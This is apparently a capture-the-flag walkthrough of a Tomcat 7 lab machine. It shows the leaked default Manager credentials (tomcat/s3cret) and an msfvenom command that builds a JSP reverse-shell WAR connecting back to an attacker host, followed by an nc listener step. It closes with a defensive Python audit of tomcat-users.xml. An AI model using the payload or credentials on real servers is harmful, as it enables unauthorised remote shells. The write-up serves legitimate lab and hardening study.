Machine IP — 10.10.10.95

Nmap
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Here we found only port 8080 open. After visiting it we get to know that Apache Tomcat 7.0.88 is running on it.
After enumerating for a while we find the Manager App. When we select it, we get a login popup, and after giving invalid creds it redirects us to a 404 page where the username and password are shown in plain text:
a user named tomcat with a password of s3cret
Now that we have a username and password, let's try logging in again. This time we get the Tomcat Web Application Manager.
There we get an upload option, which uploads WAR files.

So let's make a .war payload with msfvenom:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

Now let's upload this shell1.war. After uploading we get a new path in the application manager, shell1.war.

So let's start our nc on the selected port
and call shell1.war from the application manager.

And here we get our system shell. Now we can access every file on the system 😉
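
The whole chain above depends on a Manager account that still uses the credentials printed on the error page. As an added example (not part of the original write-up), here is a defender-side audit of conf/tomcat-users.xml that flags such accounts; the sample file, the extra weak pairs and the 12-character minimum are assumptions made for the illustration.

```python
import xml.etree.ElementTree as ET

# Manager roles; the first set can deploy WAR files (HTML upload form or text API).
DEPLOY_ROLES = {"manager-gui", "manager-script"}
MANAGER_ROLES = DEPLOY_ROLES | {"manager-jmx", "manager-status"}
# tomcat/s3cret is the pair from this write-up; the other pairs are constructed.
WEAK_PAIRS = {("tomcat", "s3cret"), ("tomcat", "tomcat"), ("admin", "admin")}
MIN_LENGTH = 12  # assumed local password policy

# Constructed sample of conf/tomcat-users.xml, not taken from the target.
SAMPLE = """<tomcat-users>
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="deployer" password="Xq7!vR2#pLm9zT4w" roles="manager-script"/>
  <user username="viewer" password="viewer" roles="manager-status"/>
  <user username="app" password="app" roles="appuser"/>
</tomcat-users>"""


def audit_users(xml_text):
    """Return (username, severity, reason) for each weak Manager account."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        # Some Tomcat versions declare an XML namespace on this file; drop it.
        if el.tag.rsplit("}", 1)[-1] != "user":
            continue
        name = el.get("username", "")
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",")}
        if not roles & MANAGER_ROLES:
            continue  # account cannot reach the Manager application
        if (name, password) in WEAK_PAIRS:
            reason = "documented example credentials"
        elif password == name or len(password) < MIN_LENGTH:
            reason = "guessable or short password"
        else:
            continue
        # Accounts that can upload a WAR are the ones that lead to code execution.
        severity = "high" if roles & DEPLOY_ROLES else "medium"
        findings.append((name, severity, reason))
    return findings


if __name__ == "__main__":
    for name, severity, reason in audit_users(SAMPLE):
        print(f"[{severity}] {name}: {reason}")
```

A "high" finding is an account that can reach the WAR upload used above, so it should get a new password or lose the role before the Manager is reachable from the network.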